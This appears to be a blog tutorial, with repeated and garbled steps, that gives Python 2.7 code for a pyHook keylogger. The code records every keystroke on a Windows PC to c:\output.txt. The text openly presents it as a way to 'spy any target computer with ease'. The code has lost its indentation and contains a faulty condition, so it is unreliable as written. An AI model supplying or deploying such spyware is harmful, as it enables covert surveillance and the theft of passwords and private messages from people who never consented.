In this tutorial we will show you how to create an own keylogger to record key strokes in PC directly using Python programming. Using this method you can spy any target computer with ease.
SOFTWARE USED:
Phython 2.7 Click Here For Download
STEP 1: From the start menu select,” Python 2.7 > IDLE(Python GUI)”
STEP 2: Click “File > New window”
STEP 3: Now type the below code in Phython window .,
Done!!!
SOFTWARE USED:
Phython 2.7 Click Here For Download
STEP 1: From the start menu select,” Python 2.7 > IDLE(Python GUI)”
STEP 2: Click “File > New window”
STEP 3: Now type the below code in Phython window .,
import win32apiSTEP 4 :Save the file in C:\ as Keylogger.py and click RUN( CTRL + R: the keylogger will come started in the background and will run until the log file "C: \ output.txt" anything that will typed on the keyboard. )
import sys
import pythoncom, pyHook
buffer = ''
def OnKeyboardEvent(event):
if event.Ascii == 5:
sys.exit()
if event.Ascii != 0 or 8:
f = open ('c:\\output.txt', 'a')
keylogs = chr(event.Ascii)
if event.Ascii == 13:
keylogs = keylogs + '\n'
f.write(keylogs)
f.close()
while True:
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
Done!!!
0 comments:
Post a Comment